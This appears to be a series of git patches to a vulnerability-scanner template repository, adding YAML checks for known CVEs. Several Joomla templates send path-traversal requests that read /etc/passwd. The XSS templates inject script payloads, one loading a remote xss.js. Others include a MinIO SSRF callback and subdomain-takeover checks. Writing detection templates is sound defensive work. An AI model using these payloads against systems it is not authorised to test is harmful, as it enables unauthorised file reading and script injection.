+++ b/cves/2010/CVE-2010-1952.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1952 + +info: + name: Joomla! Component BeeHeard 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12239 + - https://www.cvedetails.com/cve/CVE-2010-1952 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From c38efae94085677bd4415c52f313e7c168341506 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 14 Sep 2021 05:24:38 +0700 Subject: [PATCH 261/339] Create CVE-2010-1352.yaml --- cves/2010/CVE-2010-1352.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1352.yaml diff --git a/cves/2010/CVE-2010-1352.yaml b/cves/2010/CVE-2010-1352.yaml new file mode 100644 index 0000000000..5dd77fa70f --- /dev/null +++ b/cves/2010/CVE-2010-1352.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1352 + +info: + name: Joomla! Component Juke Box 1.7 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12084 + - https://www.cvedetails.com/cve/CVE-2010-1352 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 598eaf62d66eabb98389136354e5f7626abc271e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 14 Sep 2021 05:33:49 +0700 Subject: [PATCH 262/339] Create CVE-2014-9444.yaml --- cves/2014/CVE-2014-9444.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2014/CVE-2014-9444.yaml diff --git a/cves/2014/CVE-2014-9444.yaml b/cves/2014/CVE-2014-9444.yaml new file mode 100644 index 0000000000..ee9101bfe7 --- /dev/null +++ b/cves/2014/CVE-2014-9444.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-9444 + +info: + name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 + - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' part: body - type: word From 4b1bca299d7beb8c5aff228a9b0e7b536877840b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 14 Sep 2021 17:31:27 +0700 Subject: [PATCH 266/339] Create CVE-2021-21287.yaml --- cves/2021/CVE-2021-21287.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2021/CVE-2021-21287.yaml diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml new file mode 100644 index 0000000000..1cc1953f08 --- /dev/null +++ b/cves/2021/CVE-2021-21287.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-21287 + +info: + name: MinIO Browser API SSRF + author: pikpikcu + severity: high + description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability. + reference: | + - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 + - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q + tags: cve,cve2021,minio,ssrf,oob + +requests: + - method: POST + path: + - '{{BaseURL}}/minio/webrpc' + body: | + {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + headers: + Host: {{interactsh-url}} + Content-Type: application/json + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" # Confirms the HTTP Interaction From ede2e49751e727673302214403e83d1e272b6eff Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 14 Sep 2021 16:52:28 +0530 Subject: [PATCH 267/339] Update CVE-2021-21287.yaml --- cves/2021/CVE-2021-21287.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 1cc1953f08..2d801cbdd7 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability. - reference: | + reference: - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q @@ -17,9 +17,11 @@ requests: - '{{BaseURL}}/minio/webrpc' body: | {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + headers: Host: {{interactsh-url}} Content-Type: application/json + User-Agent: Mozilla/5.0 matchers: - type: word From d38052f05a8b6d00d0508af3af35102cdbcb3870 Mon Sep 17 00:00:00 2001 From: Rotem Reiss Date: Tue, 14 Sep 2021 14:26:36 +0300 Subject: [PATCH 268/339] Improve AWS Elasticbeanstalk Improve AWS Elasticbeanstalk with a better matcher to prevent high-severity alerts on non-hijackable domains and add an extractor for better usage. --- dns/elasticbeantalk-takeover-detection.yaml | 25 +++++++++++++++++---- 1 file changed, 21 insertions(+), 4 deletions(-) diff --git a/dns/elasticbeantalk-takeover-detection.yaml b/dns/elasticbeantalk-takeover-detection.yaml index a4b596bf90..c5dfc13a46 100644 --- a/dns/elasticbeantalk-takeover-detection.yaml +++ b/dns/elasticbeantalk-takeover-detection.yaml @@ -5,11 +5,20 @@ info: author: philippedelteil severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 # kudos to @m7mdharoun for sharing process details. - https://twitter.com/payloadartist/status/1362035009863880711 - https://www.youtube.com/watch?v=srKIqhj_ki8 tags: dns,takeover,aws +# You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover. +# Do not report this without claiming the CNAME. +# +# CLI command to verify the availability of the environment: +# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} +# Example: +# CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com +# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c + dns: - name: "{{FQDN}}" type: A @@ -18,9 +27,17 @@ dns: retries: 3 matchers-condition: and matchers: - - type: word - words: - - "elasticbeanstalk" + - type: regex + name: elasticbeanstalk + regex: + # Only CNAMEs with region specification are hijackable. + - \.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com + condition: or - type: word words: - "NXDOMAIN" + extractors: + - type: regex + group: 1 + regex: + - "IN\tCNAME\t(.+)" From 81fbbf028054b7dc608dfb09b0fd79c7555fdb7f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 14 Sep 2021 16:59:42 +0530 Subject: [PATCH 269/339] Update elasticbeantalk-takeover-detection.yaml --- dns/elasticbeantalk-takeover-detection.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/dns/elasticbeantalk-takeover-detection.yaml b/dns/elasticbeantalk-takeover-detection.yaml index c5dfc13a46..79aa08e653 100644 --- a/dns/elasticbeantalk-takeover-detection.yaml +++ b/dns/elasticbeantalk-takeover-detection.yaml @@ -14,10 +14,10 @@ info: # Do not report this without claiming the CNAME. # # CLI command to verify the availability of the environment: -# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} +# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} # Example: # CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com -# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c +# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c dns: - name: "{{FQDN}}" @@ -25,17 +25,21 @@ dns: class: inet recursion: true retries: 3 + matchers-condition: and matchers: + - type: regex name: elasticbeanstalk regex: # Only CNAMEs with region specification are hijackable. - \.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com condition: or + - type: word words: - "NXDOMAIN" + extractors: - type: regex group: 1 From fbc810b9a73b5bc124a798c05e3b726c08cbea00 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 17:50:57 +0530 Subject: [PATCH 270/339] misc update --- ...ion.yaml => elasticbeantalk-takeover.yaml} | 28 +++++++++---------- 1 file changed, 13 insertions(+), 15 deletions(-) rename dns/{elasticbeantalk-takeover-detection.yaml => elasticbeantalk-takeover.yaml} (51%) diff --git a/dns/elasticbeantalk-takeover-detection.yaml b/dns/elasticbeantalk-takeover.yaml similarity index 51% rename from dns/elasticbeantalk-takeover-detection.yaml rename to dns/elasticbeantalk-takeover.yaml index 79aa08e653..8a06147859 100644 --- a/dns/elasticbeantalk-takeover-detection.yaml +++ b/dns/elasticbeantalk-takeover.yaml @@ -1,23 +1,24 @@ -id: elasticbeantalk-takeover-detection +id: elasticbeantalk-takeover info: - name: Elastic BeanTalk takeover detection - author: philippedelteil + name: ElasticBeanTalk takeover detection + author: philippedelteil,rotemreiss severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 # kudos to @m7mdharoun for sharing process details. - https://twitter.com/payloadartist/status/1362035009863880711 - https://www.youtube.com/watch?v=srKIqhj_ki8 tags: dns,takeover,aws - -# You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover. -# Do not report this without claiming the CNAME. -# -# CLI command to verify the availability of the environment: -# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} -# Example: -# CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com -# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c + additional-fields: + comments: | + Only CNAMEs with region specification are hijackable. + You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover. + Do not report this without claiming the CNAME. + CLI command to verify the availability of the environment: + aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} + For example: + CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com + Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c dns: - name: "{{FQDN}}" @@ -30,11 +31,8 @@ dns: matchers: - type: regex - name: elasticbeanstalk regex: - # Only CNAMEs with region specification are hijackable. - \.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com - condition: or - type: word words: From 5b09b9ca113aa58610d01657582b35505f195b41 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 20:15:44 +0530 Subject: [PATCH 271/339] misc update --- cves/2021/CVE-2021-21287.yaml | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 2d801cbdd7..7f5e188f12 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -6,25 +6,27 @@ info: severity: high description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability. reference: + - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 - - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q tags: cve,cve2021,minio,ssrf,oob requests: - - method: POST - path: - - '{{BaseURL}}/minio/webrpc' - body: | - {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + - raw: + - | + POST /minio/webrpc HTTP/1.1 + Host: {{interactsh-url}} + Content-Type: application/json - headers: - Host: {{interactsh-url}} - Content-Type: application/json - User-Agent: Mozilla/5.0 + {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + matchers-condition: and matchers: + - type: status + status: + - 200 + - type: word part: interactsh_protocol words: - - "http" # Confirms the HTTP Interaction + - "http" # Confirms the HTTP Interaction \ No newline at end of file From 84abafbcf0719f2d21780fdaaefd7bc195041228 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 20:20:56 +0530 Subject: [PATCH 272/339] Added detection template --- technologies/minio-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/minio-detect.yaml diff --git a/technologies/minio-detect.yaml b/technologies/minio-detect.yaml new file mode 100644 index 0000000000..aab5ca4231 --- /dev/null +++ b/technologies/minio-detect.yaml @@ -0,0 +1,22 @@ +id: minio-detect + +info: + name: Minio Detection + author: pdteam + severity: info + tags: tech,minio + +requests: + - method: GET + path: + - "{{BaseURL}}/minio/login" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "MinIO Browser" \ No newline at end of file From 6e5255514dd0e04898a266dbb4f5a772d44a8891 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 20:47:58 +0530 Subject: [PATCH 273/339] misc update --- cves/2021/CVE-2021-21287.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 7f5e188f12..030ce0d427 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -17,16 +17,18 @@ requests: POST /minio/webrpc HTTP/1.1 Host: {{interactsh-url}} Content-Type: application/json + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Length: 76 {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: interactsh_protocol words: - - "http" # Confirms the HTTP Interaction \ No newline at end of file + - "http" # Confirms the HTTP Interaction + + - type: word + words: + - "We encountered an internal error" \ No newline at end of file From d39ba8391e30abb076b4e2046a9a094f2c38e2df Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 Sep 2021 15:20:20 +0000 Subject: [PATCH 274/339] Auto Generated CVE annotations [Tue Sep 14 15:20:20 UTC 2021] :robot: --- cves/2021/CVE-2021-21287.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 030ce0d427..0758519bac 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -10,6 +10,11 @@ info: - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 tags: cve,cve2021,minio,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.70 + cve-id: CVE-2021-21287 + cwe-id: CWE-918 requests: - raw: From 9011c7a779463d40600bc1d1ddf934f99f26b3b3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 14 Sep 2021 20:53:58 -0300 Subject: [PATCH 275/339] Update azure-takeover-detection.yaml This will display what type of service take over is possible. --- dns/azure-takeover-detection.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index 9f966d436d..67bee6345b 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -44,3 +44,8 @@ dns: - type: word words: - "NXDOMAIN" + extractors: + - type: regex + group: 1 + regex: + - "IN\tCNAME\t(.+)" From 1aaa4203ec666f49adf10583809ef0e706d1b0e6 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 15 Sep 2021 07:06:31 +0700 Subject: [PATCH 276/339] Create CVE-2010-1957.yaml --- cves/2010/CVE-2010-1957.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1957.yaml diff --git a/cves/2010/CVE-2010-1957.yaml b/cves/2010/CVE-2010-1957.yaml new file mode 100644 index 0000000000..7f16c277c4 --- /dev/null +++ b/cves/2010/CVE-2010-1957.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1957 + +info: + name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12235 + - https://www.cvedetails.com/cve/CVE-2010-1957 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 85c32c4cd2080f9cce4b599b91ebb531b67c369f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:00:16 +0700 Subject: [PATCH 277/339] Create CVE-2018-12998.yaml --- cves/2018/CVE-2018-12998.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2018/CVE-2018-12998.yaml diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml new file mode 100644 index 0000000000..67b81eba21 --- /dev/null +++ b/cves/2018/CVE-2018-12998.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-12998 + +info: + name: Zoho manageengine Arbitrary Reflected XSS + author: pikpikcu + severity: medium + descreption: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + reference: + - https://github.com/unh3x/just4cve/issues/10 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 + - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html + tags: cves,cve2018,zoho,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + words: + - 'Content-Type: text/html' + part: header From 796093ae5df86d2d5c19e44674cb0be5efd6338b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:26:23 +0700 Subject: [PATCH 278/339] Create CVE-2021-37833.yaml --- cves/2021/CVE-2021-37833.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-37833.yaml diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml new file mode 100644 index 0000000000..e720ad1081 --- /dev/null +++ b/cves/2021/CVE-2021-37833.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-37833 + +info: + name: Hotel Druid 3.0.2 XSS + author: pikpikcu + severity: medium + descreption: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + reference: + - https://github.com/dievus/CVE-2021-37833 + - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 + tags: cves,cve2021,hotel-druid,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b">w5px3=1' + - '{{BaseURL}}/storia_soldi.php?piu17">e3esq=1' + - '{{BaseURL}}/tabella.php?jkuh3">yql8b=1' + - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 3a2eacf6b92ad2467a07b2dce6d3f662333ae844 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:31:34 +0700 Subject: [PATCH 279/339] Update CVE-2018-12998.yaml --- cves/2018/CVE-2018-12998.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index 67b81eba21..fdc71f0e37 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml @@ -4,7 +4,7 @@ info: name: Zoho manageengine Arbitrary Reflected XSS author: pikpikcu severity: medium - descreption: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. reference: - https://github.com/unh3x/just4cve/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 From fde477de48b219c1d78853dd8981c2cc9e4e9edf Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:32:11 +0700 Subject: [PATCH 280/339] Update CVE-2021-37833.yaml --- cves/2021/CVE-2021-37833.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml index e720ad1081..da7b18b64c 100644 --- a/cves/2021/CVE-2021-37833.yaml +++ b/cves/2021/CVE-2021-37833.yaml @@ -4,7 +4,7 @@ info: name: Hotel Druid 3.0.2 XSS author: pikpikcu severity: medium - descreption: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + description: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. reference: - https://github.com/dievus/CVE-2021-37833 - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 From 3ca80153b3056351663edcf48f3ba9511c98dcf1 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:36:38 +0700 Subject: [PATCH 281/339] Create CVE-2021-35265.yaml --- cves/2021/CVE-2021-35265.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2021/CVE-2021-35265.yaml diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml new file mode 100644 index 0000000000..bbdb198b8a --- /dev/null +++ b/cves/2021/CVE-2021-35265.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-35265 + +info: + name: MaxSite CMS XSS + author: pikpikcu + severity: medium + description: reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. + reference: + - https://github.com/maxsite/cms/issues/414#issue-726249183 + - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 + tags: cves,cve2021,maxsite,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' + - '{{BaseURL}}/maxsite/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' + + matchers-condition: and + matchers: + + - type: word + words: + - '">' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 04ab1bb769b7737e6b19b27f049934b1791550b0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:45:52 +0700 Subject: [PATCH 282/339] Create CVE-2021-24364.yaml --- cves/2021/CVE-2021-24364.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2021/CVE-2021-24364.yaml diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml new file mode 100644 index 0000000000..f10ff32829 --- /dev/null +++ b/cves/2021/CVE-2021-24364.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-24364 + +info: + name: Jannah < 5.4.4 (XSS) + author: pikpikcu + severity: medium + description: he Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. + reference: + - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 + tags: cves,cve2021,wordpress,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275\">%27%2C%27custom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 936ec94e23bf6ec502a509306070377418d001ee Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:51:50 +0700 Subject: [PATCH 283/339] Create CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2021/CVE-2021-24407.yaml diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml new file mode 100644 index 0000000000..669cda4004 --- /dev/null +++ b/cves/2021/CVE-2021-24407.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-24407 + +info: + name: Jannah < 5.4.5 - Reflected Cross-Site Scripting (XSS) + author: pikpikcu + severity: medium + description: he Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability. + reference: + - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 + tags: cves,cve2021,wordpress,xss + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + action=tie_ajax_search&query[]= + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 643623211cee596ca12f77d2d72ae234eb81298b Mon Sep 17 00:00:00 2001 From: PikPikcU 